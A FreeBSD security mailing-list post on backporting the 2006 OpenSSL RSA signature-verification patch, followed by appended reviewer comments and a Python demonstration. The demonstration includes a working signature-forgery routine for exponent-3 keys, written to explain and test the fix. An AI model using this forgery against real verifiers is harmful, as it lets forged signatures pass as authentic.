From owner-freebsd-security@FreeBSD.ORG Tue Sep 5 15:56:35 2006
From: Mike Tancsa <mike@sentex.net>
To: freebsd-security@FreeBSD.org
Date: Tue, 05 Sep 2006 11:56:30 -0400
Subject: Re: http://www.openssl.org/news/secadv_20060905.txt
Message-Id: <7.0.1.0.0.20060905112743.149f17c8@sentex.net>
In-Reply-To: <7.0.1.0.0.20060905105253.149db9a8@sentex.net>
X-BeenThere: freebsd-security@freebsd.org

At 10:53 AM 9/5/2006, Mike Tancsa wrote:
>Does anyone know the practicality of this attack? i.e. is this
>trivial to do?

Also, for RELENG_6, can someone confirm that the patch referenced in
http://www.openssl.org/news/patch-CVE-2006-4339.txt can be applied with
the one change of

+{ERR_REASON(RSA_R_PKCS1_PADDING_TOO_SHORT),"pkcs1 padding too short"},

to

+{RSA_R_PKCS1_PADDING_TOO_SHORT,"pkcs1 padding too short"},

I manually added in the diffs and everything seems to compile and
function with some limited testing. I did

cd /usr/src/crypto/openssl/crypto/rsa
patch < p
cd /usr/src/secure
make clean
make obj
make depend
make includes
make
make install

        ---Mike

>--------------------------------------------------------------------
>Mike Tancsa, tel +1 519 651 3400
>Sentex Communications, mike@sentex.net
>Providing Internet since 1994 www.sentex.net
>Cambridge, Ontario Canada www.sentex.net/mike
>
>_______________________________________________
>freebsd-security@freebsd.org mailing list
>http://lists.freebsd.org/mailman/listinfo/freebsd-security
>To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

Attachment: p

*** rsa.h.old	Fri Feb 25 00:49:43 2005
--- rsa.h	Tue Sep  5 11:35:10 2006
***************
*** 352,357 ****
--- 352,358 ----
  #define RSA_R_N_DOES_NOT_EQUAL_P_Q			 127
  #define RSA_R_OAEP_DECODING_ERROR			 121
  #define RSA_R_PADDING_CHECK_FAILED			 114
+ #define RSA_R_PKCS1_PADDING_TOO_SHORT			 105
  #define RSA_R_P_NOT_PRIME				 128
  #define RSA_R_Q_NOT_PRIME				 129
  #define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED		 130
*** rsa_eay.c.old	Tue Sep  5 11:34:50 2006
--- rsa_eay.c	Tue Sep  5 11:36:00 2006
***************
*** 569,574 ****
--- 569,584 ----
  		{
  	case RSA_PKCS1_PADDING:
  		r=RSA_padding_check_PKCS1_type_1(to,num,buf,i,num);
+ 		/* Generally signatures should be at least 2/3 padding, though
+ 		   this isn't possible for really short keys and some standard
+ 		   signature schemes, so don't check if the unpadded data is
+ 		   small. */
+ 		if(r > 42 && 3*8*r >= BN_num_bits(rsa->n))
+ 			{
+ 			RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_PKCS1_PADDING_TOO_SHORT);
+ 			goto err;
+ 			}
+ 
  		break;
  	case RSA_NO_PADDING:
  		r=RSA_padding_check_none(to,num,buf,i,num);
*** rsa_err.c.old	Tue Sep  5 11:36:09 2006
--- rsa_err.c	Tue Sep  5 11:36:39 2006
***************
*** 120,125 ****
--- 120,126 ----
  {RSA_R_N_DOES_NOT_EQUAL_P_Q              ,"n does not equal p q"},
  {RSA_R_OAEP_DECODING_ERROR               ,"oaep decoding error"},
  {RSA_R_PADDING_CHECK_FAILED              ,"padding check failed"},
+ {RSA_R_PKCS1_PADDING_TOO_SHORT           ,"pkcs1 padding too short"},
  {RSA_R_P_NOT_PRIME                       ,"p not prime"},
  {RSA_R_Q_NOT_PRIME                       ,"q not prime"},
  {RSA_R_RSA_OPERATIONS_NOT_SUPPORTED      ,"rsa operations not supported"},
*** rsa_sign.c.old	Wed Oct  1 08:32:39 2003
--- rsa_sign.c	Tue Sep  5 11:37:29 2006
***************
*** 185,190 ****
--- 185,208 ----
  		sig=d2i_X509_SIG(NULL,&p,(long)i);
  
  		if (sig == NULL) goto err;
+ 
+ 		/* Excess data can be used to create forgeries */
+ 		if(p != s+i)
+ 			{
+ 			RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE);
+ 			goto err;
+ 			}
+ 
+ 		/* Parameters to the signature algorithm can also be used to
+ 		   create forgeries */
+ 		if(sig->algor->parameter
+ 		   && ASN1_TYPE_get(sig->algor->parameter) != V_ASN1_NULL)
+ 			{
+ 			RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE);
+ 			goto err;
+ 			}
+ 
+ 
  		sigtype=OBJ_obj2nid(sig->algor->algorithm);
  
  
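Review bot: the value 105 given to RSA_R_PKCS1_PADDING_TOO_SHORT in the rsa.h hunk lies below the 114-130 run of the neighbouring codes, so verify against the full RSA_R_* list in rsa.h that 105 is unused before committing; a duplicated reason code would make ERR_reason_error_string() attach the new "pkcs1 padding too short" text to the wrong error. The alphabetical placement after RSA_R_PADDING_CHECK_FAILED is consistent with the rest of the list.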
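Review bot: in the rsa_eay.c hunk the condition `if(r > 42 && 3*8*r >= BN_num_bits(rsa->n))` rejects well-formed signatures whose DigestInfo exceeds a third of the modulus, not only forgeries: a SHA-256 DigestInfo is 51 bytes, and with a 1024-bit key 3*8*51 = 1224 >= 1024, so such a signature fails with RSA_R_PKCS1_PADDING_TOO_SHORT, while the r > 42 exemption only spares the 34- and 35-byte MD5 and SHA-1 encodings. Either document that constraint for RELENG_6 users or raise the threshold; the check is defence in depth, since the rsa_sign.c test that the DigestInfo consumed every recovered byte is what blocks the excess-data forgery. When the padding check fails, r is -1, which correctly skips the new branch and leaves the existing error handling in place.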
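Review bot: in the rsa_err.c hunk, replacing ERR_REASON(RSA_R_PKCS1_PADDING_TOO_SHORT) with the bare constant is the right adaptation, because every other entry in this table is a bare RSA_R_* code; ERR_REASON() is the macro the 0.9.8-series error tables wrap their codes in and is not defined in this file. Keeping the upstream string "pkcs1 padding too short" unchanged, as done, matters for anything that matches on OpenSSL error text. Since rsa_err.c is generated from rsa.h by util/mkerr.pl, a later regeneration will re-derive this row from the rsa.h define, so the two hunks must keep the same name.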
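Review bot: the `if(p != s+i)` test in the rsa_sign.c hunk closes the excess-data hole only for callers of RSA_verify(); code that calls RSA_public_decrypt() itself and compares the recovered bytes gets no protection from this hunk and needs an equivalent length check of its own. The parameter test accepts both an absent parameter and an explicit ASN.1 NULL, so signatures from either kind of encoder still verify, which is the right trade-off; the algorithm OID is still consumed only through the sigtype line after the hunk, so the comparison of sigtype against the expected digest NID must remain exact for the AlgorithmIdentifier to be fully pinned.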
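Added example, not code from this thread or from OpenSSL: a pure-Python model of the forgery that the patch's "Excess data can be used to create forgeries" comment refers to, beside a verifier that applies both new checks. It assumes a public exponent of 3, a 2048-bit demonstration key, a constructed message and invented function names. forge() never touches a private key: it builds a block of minimal padding, the DigestInfo and free space, takes an integer cube root, and relies on a decoder that stops at the end of the DigestInfo SEQUENCE. The round-up-the-cube-root construction used here needs roughly two thirds of the block to be free, which is why a 2048-bit modulus rather than a 1024-bit one is used. padding_too_short() is the rsa_eay.c condition on its own, so the effect of the threshold on ordinary keys and digests can be checked directly.

```python
"""Model of the CVE-2006-4339 forgery and of the two checks in the patch above.

Added example, not code from the thread or from OpenSSL.  Key size, seed,
message and every function name are assumptions; e = 3 throughout.
"""
import hashlib
import random

# DER DigestInfo for SHA-1 minus the 20-byte digest (RFC 3447 section 9.2).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info(msg):
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def is_probable_prime(n, rng, rounds=16):
    """Miller-Rabin, adequate for a demonstration key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def make_key(bits, rng, e=3):
    """Demonstration RSA key with public exponent 3 (p and q of bits/2 each)."""
    def prime():
        while True:
            c = rng.getrandbits(bits // 2) | (3 << (bits // 2 - 2)) | 1
            if (c - 1) % e and is_probable_prime(c, rng):
                return c
    p, q = prime(), prime()
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))


def sign(msg, n, d):
    """Honest PKCS#1 v1.5 type-1 signature: 00 01 FF..FF 00 DigestInfo."""
    k = (n.bit_length() + 7) // 8
    t = digest_info(msg)
    em = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(k, "big")


def icbrt(x):
    """Floor of the integer cube root."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge(msg, n):
    """No private key: put minimal padding plus the DigestInfo at the top of the
    block, leave the rest free, and take the cube root.  The cube then starts
    with the wanted bytes and ends in junk that a lenient decoder never reads."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    target = int.from_bytes(head + b"\x00" * (k - len(head)), "big")
    s = icbrt(target)
    if s ** 3 < target:
        s += 1                      # smallest s with s**3 >= target
    assert s ** 3 < n               # no modular reduction at verify time
    return s.to_bytes(k, "big")


def recover_block(sig, n, e=3):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")


def unpad_type1(em):
    """Mirror of RSA_padding_check_PKCS1_type_1: 00 01, at least eight FF, 00, data."""
    if len(em) < 11 or em[0] != 0 or em[1] != 1:
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i == len(em) or em[i] != 0:
        return None
    return em[i + 1:]


def parse_digest_info(data):
    """Model of d2i_X509_SIG: consume one DER SEQUENCE (short length form) and
    report how many bytes it used; trailing bytes are never looked at."""
    if len(data) < 2 or data[0] != 0x30 or data[1] >= 0x80:
        return None
    end = 2 + data[1]
    if end > len(data):
        return None
    return data[:end], end


def padding_too_short(r, nbits):
    """The rsa_eay.c check: recovered data over 42 bytes and at least 1/3 of the modulus."""
    return r > 42 and 3 * 8 * r >= nbits


def verify_unpatched(msg, sig, n, e=3):
    data = unpad_type1(recover_block(sig, n, e))
    if data is None:
        return False
    parsed = parse_digest_info(data)
    # Bug: bytes after the SEQUENCE are ignored, so junk after the DigestInfo is accepted.
    return parsed is not None and parsed[0] == digest_info(msg)


def verify_patched(msg, sig, n, e=3):
    data = unpad_type1(recover_block(sig, n, e))
    if data is None:
        return False
    if padding_too_short(len(data), n.bit_length()):    # rsa_eay.c hunk
        return False
    parsed = parse_digest_info(data)
    if parsed is None or parsed[1] != len(data):        # rsa_sign.c hunk: p != s+i
        return False
    return parsed[0] == digest_info(msg)                # byte-exact, so a non-NULL parameter fails too


def demo(bits=2048, seed=20060905):
    rng = random.Random(seed)
    n, e, d = make_key(bits, rng)
    msg = b"constructed sample message"               # constructed input
    good, bad = sign(msg, n, d), forge(msg, n)
    return {
        "good_unpatched": verify_unpatched(msg, good, n),
        "good_patched": verify_patched(msg, good, n),
        "forged_unpatched": verify_unpatched(msg, bad, n),
        "forged_patched": verify_patched(msg, bad, n),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'}")
```

Running it shows the honest signature accepted by both verifiers and the forged one accepted only by the unpatched verifier. padding_too_short(51, 1024) is True, meaning the rsa_eay.c threshold also rejects a well-formed SHA-256 DigestInfo under a 1024-bit key, which is the caveat a RELENG_6 user should know about before deploying the check; the rsa_sign.c length test alone is what makes the forged block fail.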